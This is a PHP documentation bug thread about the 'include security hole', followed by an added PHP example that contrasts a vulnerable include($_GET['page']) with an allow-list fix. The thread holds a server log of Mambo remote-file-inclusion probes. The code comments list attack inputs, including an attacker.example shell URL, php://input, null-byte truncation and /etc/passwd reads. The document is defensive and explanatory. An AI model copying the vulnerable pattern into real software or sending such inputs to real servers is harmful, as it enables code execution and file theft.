ID: 37874
Updated by: [EMAIL PROTECTED]
Reported By: Harry dot Boeck at t-online dot de
-Status: Assigned
+Status: Closed
Bug Type: Documentation problem
Operating System: all
PHP Version: Irrelevant
Assigned To: colder
New Comment:
This bug has been fixed in the documentation's XML sources. Since the online and downloadable versions of the documentation need some time to get updated, we would like to ask you to be a bit patient. Thank you for the report, and for helping us make our documentation better.

some improvements

Previous Comments:
------------------------------------------------------------------------
[2006-12-21 06:58:43] mohammedferoz123 at gmail dot com

PLEASE SEND SOME SAMPLE TEST CASES OF WEB APPLICATION AND CLIENT SERVER APPLICATION
------------------------------------------------------------------------
[2006-06-23 04:23:47] judas dot iscariote at gmail dot com

In my latest comment I really mean "even **without** allow_url_fopen enabled".
------------------------------------------------------------------------
[2006-06-23 04:22:28] judas dot iscariote at gmail dot com

Your latest comment has nothing to do with allow_url_fopen. It looks like that is a combination of a MOS bug with the GLOBALS overwrite issue detected by Steffan Esser some time ago.

Additionally, buggy code like include $_GET['page'] can be exploited even with allow_url_fopen, to read local files, or for arbitrary code execution by tricking the php://input wrapper (which does not obey allow_url_fopen at all). I think this last point, and the NULL byte attack, should be mentioned in the security docs too.
------------------------------------------------------------------------
[2006-06-22 15:13:24] Harry dot Boeck at t-online dot de

Well, when I look at the intrusion attempts on my server, for example (cut off from the log):

req:"GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=...
req:"GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=...
req:"GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=...
req:"GET /Mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=...
req:"GET /news/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=...
req:"GET /home/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=...
req:"GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=...
req:"GET /index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=...
req:"GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=...
req:"GET /Mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=...
req:"GET /news/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=...
req:"GET /home/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=...
req:"GET /cvs/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=...

then it seems that there are at least _a_few_ people out there not being able to read the "pretty well" documentation while being able to program widespread public programs, versus being able to set up servers. They are, of course, only extremely rare exceptions!

OK, I have done all I could to help those guys. If it shouldn't be, then I will let it be.
------------------------------------------------------------------------
[2006-06-22 14:56:15] [EMAIL PROTECTED]

It seems that this manual page[1] needs some fixes and is not really up to date. I'll also add something about the "include security hole".
[1] http://php.net/security.filesystem
------------------------------------------------------------------------
The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at http://bugs.php.net/37874
--
Edit this bug report at http://bugs.php.net/?id=37874&edit=1
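The "include security hole" the comments above discuss (include $_GET['page'], the php://input wrapper, the NULL byte trick, and the mosConfig_absolute_path probes in the posted log), as an added example that is not part of the bug report, the PHP manual, or Mambo. It shows the vulnerable pattern next to an allow-list resolver and a small classifier for logging rejected values. The page names, the ./pages/ directory, and all function names are assumptions made for the example.

```php
<?php
// Added example, not code from the bug report or the PHP manual.
// Assumed layout: templates live in ./pages/<name>.php and the allowed
// names are the hard-coded list below.
declare(strict_types=1);

// --- VULNERABLE: the pattern named in the comments -----------------------
// What ?page= can be pointed at when it reaches include() unchanged:
//   http://attacker.example/shell.txt  remote code; gated by allow_url_fopen at
//                                      the time, by allow_url_include since 5.2
//   php://input                        executes the POST body; the php:// wrapper
//                                      is not governed by allow_url_fopen
//   /etc/passwd, ../../config.php      any file the web server can read
function vulnerable_page(string $page): void
{
    include $page;
}

// Appending a suffix does not help on PHP < 5.3.4: a %00 in the parameter
// truncates the path at the NUL byte, so "../../etc/passwd\0.php" still
// opens /etc/passwd. PHP 5.3.4 and later refuse paths containing NUL.
function vulnerable_page_with_suffix(string $page): void
{
    include $page . '.php';
}

// The probes in the log set mosConfig_absolute_path= in the query string.
// That only matters if the script takes the variable from the request
// (register_globals, or the GLOBALS-overwrite issue the comment mentions)
// and then does include $mosConfig_absolute_path . '/includes/x.php':
// the same bug as above with a different variable name.

// --- HARDENED: map the request value onto a closed allow-list ------------
const ALLOWED_PAGES = ['home', 'news', 'contact'];

function resolve_page(string $page): ?string
{
    // strict comparison so "0", "" or look-alike values never match
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    // Only list entries reach the filesystem; the user value never does.
    return __DIR__ . '/pages/' . $page . '.php';
}

// Defence in depth / logging: classify a rejected value so probes like the
// ones in the posted log become visible in the application log.
function classify_page_param(string $page): string
{
    if (strpos($page, "\0") !== false) {
        return 'null-byte';
    }
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $page) === 1) {
        return 'wrapper-or-url';            // http://, php://, data://, ...
    }
    if (strpos($page, '..') !== false || ($page !== '' && $page[0] === '/')) {
        return 'traversal-or-absolute';
    }
    return 'plain';
}

function serve_page(array $query): void
{
    // ?page[]=x arrives as an array; accept only a string
    $page = isset($query['page']) && is_string($query['page']) ? $query['page'] : 'home';

    $path = resolve_page($page);
    if ($path === null || !is_file($path)) {
        error_log('rejected page parameter (' . classify_page_param($page) . '): ' . bin2hex($page));
        http_response_code(404);
        echo "unknown page\n";
        return;
    }
    include $path;
}

if (PHP_SAPI === 'cli') {
    // Exercise the resolver with the payloads discussed above.
    $samples = ['home', 'php://input', "../../etc/passwd\0", 'http://attacker.example/x', '/etc/passwd', ''];
    foreach ($samples as $p) {
        printf("%-28s -> %s (%s)\n",
            addcslashes($p, "\0"),
            resolve_page($p) === null ? 'rejected' : 'allowed',
            classify_page_param($p));
    }
} else {
    serve_page($_GET);
}
```

Run it with `php example.php` to see every sample except `home` rejected. The important design choice is that the user-supplied string is only ever compared against the list; it is never concatenated into the path, so wrapper schemes, NUL bytes and traversal never reach include() at all. The classifier is for logging only and is deliberately not the gate.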